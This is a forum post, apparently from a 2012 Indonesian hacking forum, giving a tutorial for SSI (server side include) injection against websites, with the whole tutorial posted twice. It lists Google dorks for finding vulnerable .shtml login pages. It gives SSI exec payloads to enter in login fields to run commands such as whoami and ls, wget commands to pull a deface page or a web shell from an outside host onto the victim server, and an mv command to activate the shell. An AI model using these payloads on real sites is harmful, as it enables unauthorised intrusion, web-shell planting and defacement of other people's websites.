Indeks
JurnalPencarian
Latest topics
SSI (server side include) injection, shell and deface Page uploading tutorial
Halaman 1 dari 1
SSI (server side include) injection, shell and deface Page uploading tutorial
by mandala Tue Aug 07, 2012 4:11 am
SSI (Server Side Include) is a web application exploit, you can put your codes remotely to vulnerable websites.
Server Side Include allowed you to upload files in multi extensions, but
in .php extension you can't execute your shell, you have to rename
shell.txt to shell.php
Lets Begin ....
Dorks
inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
Try any dork or find sites manually,
To check vulnerability of websites enter these commands in Username and Password
<!--#echo var="DATE_LOCAL" -->
It Will show the Date
<!--#exec cmd="whoami"-->
It Will display which user is running on the server
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux)
It Will show all files in the directory
<!-- #exec cmd="dir" --> (Windows)
It Will display all files in the directory
for example enter
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
in username and password to view all files of website
Now we have to upload our Deface page or Shell.
To upload a deface page, host/upload your deface page anywhere
you can use pastehtml.com for it,
then enter this command in Username and Password
<!--#exec cmd="wget [You must be registered and logged in to see this link.]" -->
To view your Deface page goto site.com/deface.html
To upload a Shell on website you have to host your shell anywhere in .txt format
then enter this command in login
<!--#exec cmd="wget [You must be registered and logged in to see this link.]" -->
to check your txt file is uploaded or not list all files using
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
Now you have to chnage .txt extention to .php
to rename your txt file to php use this command
<!--#exec cmd="mv abc.txt abc.php" -->
Now goto site.com/abc.php and acess your shell
Live demo
[You must be registered and logged in to see this link.]
(Please don't harm to site upload your files for test only ! Thanks )
Server Side Include allowed you to upload files in multi extensions, but
in .php extension you can't execute your shell, you have to rename
shell.txt to shell.php
Lets Begin ....
Dorks
inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
Try any dork or find sites manually,
To check vulnerability of websites enter these commands in Username and Password
<!--#echo var="DATE_LOCAL" -->
It Will show the Date
<!--#exec cmd="whoami"-->
It Will display which user is running on the server
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux)
It Will show all files in the directory
<!-- #exec cmd="dir" --> (Windows)
It Will display all files in the directory
for example enter
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
in username and password to view all files of website
Now we have to upload our Deface page or Shell.
To upload a deface page, host/upload your deface page anywhere
you can use pastehtml.com for it,
then enter this command in Username and Password
<!--#exec cmd="wget [You must be registered and logged in to see this link.]" -->
To view your Deface page goto site.com/deface.html
To upload a Shell on website you have to host your shell anywhere in .txt format
then enter this command in login
<!--#exec cmd="wget [You must be registered and logged in to see this link.]" -->
to check your txt file is uploaded or not list all files using
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
Now you have to chnage .txt extention to .php
to rename your txt file to php use this command
<!--#exec cmd="mv abc.txt abc.php" -->
Now goto site.com/abc.php and acess your shell
Live demo
[You must be registered and logged in to see this link.]
(Please don't harm to site upload your files for test only ! Thanks )
mandala- Jumlah posting : 86
Points : 1122093
Reputation : 3
Join date : 16.12.10
Similar topics» SQL injection Basic Tutorial
» Sql Injection VULNERABLE SITES
» Tutorial MapInfo
» hacking Tutorial episode II 2010
» tutorial - membuat RADIO STATION
» Sql Injection VULNERABLE SITES
» Tutorial MapInfo
» hacking Tutorial episode II 2010
» tutorial - membuat RADIO STATION
Halaman 1 dari 1
Permissions in this forum:
Anda tidak dapat menjawab topik
» akhirnya terjawab sudah masalah saya
» solusi bau mulut, napas, kurus/obesitas, kerusakan rambut
» nulled CPA blaster
» Script Download Mp3 dari 4Shared [White Code]
» Backlink Pasang Ac Surabaya | Do follow blog - Infoac.info
» Backlink Service Ac Surabaya
» site:perawatanac.infoac.info
» Auto Approve - Bakclink September 2012
» pemesanan id betting online
» Dijual Segera Rumah Minimalis Siap Huni dan Hadap Timur | Surabaya
» Get Usernames And Passwords + Database By Google